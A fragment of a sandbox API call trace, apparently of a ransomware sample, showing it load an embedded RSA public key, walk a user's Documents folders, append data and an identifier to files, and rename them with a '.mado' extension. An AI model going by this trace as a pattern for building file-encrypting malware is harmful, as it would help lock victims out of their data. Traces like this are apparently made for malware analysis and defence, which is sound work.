KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.836] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.836] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.837] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.837] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.837] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.837] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.837] GetLastError () returned 0x0 [0205.837] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.837] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.837] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.837] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.837] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.838] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3ef4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.838] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.838] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.838] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.838] CloseHandle (hObject=0x63c) returned 1 [0205.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0205.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b74b68 [0205.839] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\zdg8OGckRRHrHeJ5LXIg.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\zdg8ogckrrhrhej5lxig.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\zdg8OGckRRHrHeJ5LXIg.odp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\zdg8ogckrrhrhej5lxig.odp.mado")) returned 1 [0205.841] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92072ed0, ftCreationTime.dwHighDateTime=0x1d5e5a0, ftLastAccessTime.dwLowDateTime=0xccd8bb20, ftLastAccessTime.dwHighDateTime=0x1d5e11b, ftLastWriteTime.dwLowDateTime=0xccd8bb20, ftLastWriteTime.dwHighDateTime=0x1d5e11b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zdg8OGckRRHrHeJ5LXIg.odp", cAlternateFileName="ZDG8OG~1.ODP")) returned 0 [0205.841] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0205.841] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0205.841] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b74b68 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b74b68 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b74b68 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b74b68 [0205.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\") returned="iZ56A9bRq3KDvJgS8nb\\" [0205.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\") returned="fZpil8Uu6QzTlWoWB\\" [0205.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.846] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.846] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.846] PathFindFileNameW (pszPath="") returned="" [0205.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf24d6280, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0x518cfaa0, ftLastAccessTime.dwHighDateTime=0x1d5dc91, ftLastWriteTime.dwLowDateTime=0x518cfaa0, ftLastWriteTime.dwHighDateTime=0x1d5dc91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.848] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf24d6280, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0x518cfaa0, ftLastAccessTime.dwHighDateTime=0x1d5dc91, ftLastWriteTime.dwLowDateTime=0x518cfaa0, ftLastWriteTime.dwHighDateTime=0x1d5dc91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.848] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf93f40, ftCreationTime.dwHighDateTime=0x1d5de09, ftLastAccessTime.dwLowDateTime=0x942927c0, ftLastAccessTime.dwHighDateTime=0x1d5e1ab, ftLastWriteTime.dwLowDateTime=0x942927c0, ftLastWriteTime.dwHighDateTime=0x1d5e1ab, nFileSizeHigh=0x0, nFileSizeLow=0x15255, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q-RNyzyi5Ha.odt", cAlternateFileName="Q-RNYZ~1.ODT")) returned 1 [0205.848] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\q-RNyzyi5Ha.odt") returned=".odt" [0205.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\q-RNyzyi5Ha.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\iz56a9brq3kdvjgs8nb\\q-rnyzyi5ha.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.849] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=86613) returned 1 [0205.849] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.851] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1522f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.851] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.852] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x15255, lpOverlapped=0x0) returned 1 [0205.853] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.853] lstrlenA (lpString="-----BEGIN PUBLIC 